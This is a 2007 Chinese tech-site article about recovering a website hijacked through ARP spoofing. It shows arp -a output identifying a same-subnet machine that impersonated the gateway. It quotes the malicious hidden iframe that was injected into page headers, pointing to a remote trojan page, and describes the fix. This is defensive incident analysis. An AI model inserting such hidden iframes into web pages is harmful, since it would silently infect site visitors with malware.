电脑软硬件应用网
当前位置: 电脑软硬件应用网 > 电脑学院 > 网络安全 > 正文
关于网站被挂http://cool.47555.com/k.htm木马的解决
关于网站被挂http://cool.47555.com/k.htm木马的解决
2007-5-21 11:33:50  文/小狼   出处:电脑软硬件应用网   

     近期电脑软硬件应用网所在服务器受到arp欺骗攻击,路由被劫持。

     挂马特征:
     在头部加入如下代码:

 <iframe style='display:none;' src=http://cool.47555.com/k.htm></iframe>  

     解决和分析过程(借鉴绿盟路由被劫持案例):

     被攻击时

 x:\Documents and Settings\Administrator>arp -a
Interface: *.123.71.119 --- 0x2
  Internet Address      Physical Address      Type
  58.123.71.1           00-13-60-*-8e-c2     dynamic
Interface: *.123.225.231 --- 0x3
  Internet Address      Physical Address      Type
  222.123.225.2         00-15-c5-ec-e2-8d     dynamic
  222.123.225.*         00-c0-*-82-5c-fa     dynamic

00-15-c5-ec-e2-8d  这个机器冒充网关,劫持了电脑软硬件应用网
然后查内网的机器发现 00-15-c5-ec-e2-8d  就是 *.123.225.232 和电脑软硬件应用网的服务器同一网段
于是立即关闭该机器,刷新arp,恢复正常

正常后查询arp 结果如下

 x:\Documents and Settings\Administrator>arp -a
Interface: *.123.71.119 --- 0x2
  Internet Address      Physical Address      Type
  58.123.71.1           00-13-60-*-8e-c2     dynamic
Interface: *.123.225.231 --- 0x3
  Internet Address      Physical Address      Type
  222.123.225.2    00-0e-38-6e-*-bf     dynamic

网关从 00-15-c5-ec-e2-8d  恢复为 00-0e-38-6e-*-bf
网站也恢复正常了

  • 上一篇文章:

  • 下一篇文章:
  • 最新热点 最新推荐 相关文章
    删不掉的"淘宝图标"来侵 教你删"淘宝…
    微软高危漏洞"快捷方式自动执行"手工…
    acad.vlx删除方法
    360se.exe病毒清除解决方案
    regedit32.exe 病毒清除解决方案
    3874jr98.exe,long.exe等病毒清除解…
    RG8.tmp病毒清除解决方案
    139ujf939.exe,2.exe等病毒清除解决…
    EntSoQn.exe病毒清除解决方案
    360safess.net.exe等病毒清除解决方…
    关于45IT | About 45IT | 联系方式 | 版权声明 | 网站导航 |

    Copyright © 2003-2011 45IT. All Rights Reserved 浙ICP备09049068号